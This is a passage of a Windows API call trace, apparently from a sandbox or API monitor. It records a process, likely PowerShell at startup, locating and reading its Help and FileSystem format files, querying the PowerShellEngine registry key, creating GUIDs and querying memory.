	[0411.218] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.219] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.219] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x119, lpOverlapped=0x0) returned 1
	[0411.219] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e0f1e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e0f1e0*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0411.219] CloseHandle (hObject=0x2fc) returned 1
	[0411.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.219] SetErrorMode (uMode=0x1) returned 0x1
	[0411.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0411.219] SetErrorMode (uMode=0x1) returned 0x1
	[0411.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0411.220] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0411.220] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0411.220] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0411.220] CoTaskMemFree (pv=0x1ffce0) 
	[0411.220] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.221] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.221] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe4de7a71, Data2=0xcff6, Data3=0x42f7, Data4=([0]=0x90, [1]=0xfb, [2]=0xb0, [3]=0x7c, [4]=0x4a, [5]=0x4f, [6]=0xa6, [7]=0xca))) returned 0x0
	[0411.221] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.222] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5c1fc80f, Data2=0x70f5, Data3=0x4317, Data4=([0]=0xae, [1]=0x3, [2]=0x2e, [3]=0xeb, [4]=0x1b, [5]=0x8a, [6]=0xd1, [7]=0x99))) returned 0x0
	[0411.222] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xb355db83, Data2=0x63e3, Data3=0x43f0, Data4=([0]=0x9c, [1]=0x73, [2]=0xbb, [3]=0xe0, [4]=0x2, [5]=0x37, [6]=0x22, [7]=0x4b))) returned 0x0
	[0411.222] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x227f1bd0, Data2=0xf4ef, Data3=0x4128, Data4=([0]=0x8f, [1]=0x71, [2]=0x83, [3]=0x3a, [4]=0x86, [5]=0xf3, [6]=0x48, [7]=0x3e))) returned 0x0
	[0411.222] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.222] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.222] SetErrorMode (uMode=0x1) returned 0x1
	[0411.222] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.222] GetFileType (hFile=0x2fc) returned 0x1
	[0411.222] SetErrorMode (uMode=0x1) returned 0x1
	[0411.222] GetFileType (hFile=0x2fc) returned 0x1
	[0411.223] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.223] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.223] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.224] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.224] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.224] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.224] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.224] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.225] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.226] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.226] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.226] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.227] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.228] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.229] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.230] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.230] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.231] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.232] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.232] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.232] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.232] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.232] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.233] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.233] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.233] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.233] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.234] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.562] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.563] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.564] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.564] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0411.564] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0xf37, lpOverlapped=0x0) returned 1
	[0411.564] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6aa1f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6aa1f*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0411.564] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e6b380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x2e6b380*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0411.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.564] SetErrorMode (uMode=0x1) returned 0x1
